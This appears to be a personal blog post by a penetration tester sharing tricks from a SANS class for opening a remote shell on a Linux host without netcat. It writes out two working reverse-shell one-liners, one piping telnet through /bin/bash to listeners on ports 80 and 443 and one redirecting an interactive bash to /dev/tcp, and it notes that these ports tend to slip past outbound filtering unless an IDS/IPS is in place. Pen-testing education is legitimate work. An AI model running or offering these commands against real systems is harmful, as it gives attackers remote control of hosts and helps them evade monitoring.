Backdoor without Netcat

So you want to get a remote shell on that box but you either cannot install software for some reason or your rules of engagement state that this is out of scope. No problem! Here is a handy little trick using our builtin tools.

Start two netcat listeners on your Windows machine:

C:\> nc -l -p 80

C:\> nc -l -p 443

From your Linux box now run the following command which opens our backdoor:

telnet [Windows Box IP] 80 | /bin/bash | telnet [Windows Box IP] 443

The interesting thing here is that everything you type in the port 80 window, the results will show up in the port 443 window. You now have remote shell to that Linux box. Probably the nicest thing about this one is that we are opening two ports from our Linux box to the Internet. Port 80 and port 443. Most likely these ports are allowed out from the box in most cases. Unless there is an IDS/IPS in place, this should skirt right under the radar.

Now if you are on a Linux box with good 'ol /dev/tcp, here is another way to do this:

On your Windows box start a netcat listener:

C:\>nc -l -p 80

Then on your Linux box run the following:

/bin/bash -i > /dev/tcp/[Windows Box IP]/80 0<&1 2>&1


Let's break this down. The -i after bash tells it to run in interactive mode. We will then take our Standard Input from the bash shell (0) and redirect this (<) to a duplicated (&) Standard Output (1). The second part is taking our Standard Error (2) of our bash shell and redirecting (>) this into a duplicated (&) Standard Output (1).


OK so that's some kick butt command line kung fu-rey. This is just one of the really nice things about taking a class at SANS. Ed Skoudis and John Strand are very good instructors (I don't mean to leave out the others. I'm sure they are good as well, I just haven't had the pleasure of taking a class from them yet). These alternate techniques came out of a challenge session between a few of the SANS instructors. They basically challenged each other "What if you don't have netcat in your pen test". These are some of the answers that came out. We did a lot more than this. We saw how to do port scans with /dev/tcp, telnet and ftp! Yes ftp! All of this without installing software on the target box.

Personally I perfer not to install software if possible. I do think clients of whom you will be pen testing would love to hear "we don't install malware or tools on your box unless completely necessary to gain access". I can just imagine them getting the warm fuzzies from this.

If you have any cool little tricks like this to share, please comment! If you like this command line stuff, you can also browse on over to the Commandline KungFu blog, where you will see these challenges that Ed Skoudis and others partake in. I have learned a bunch from this blog, not only for pen testing, but for making system administration easier too!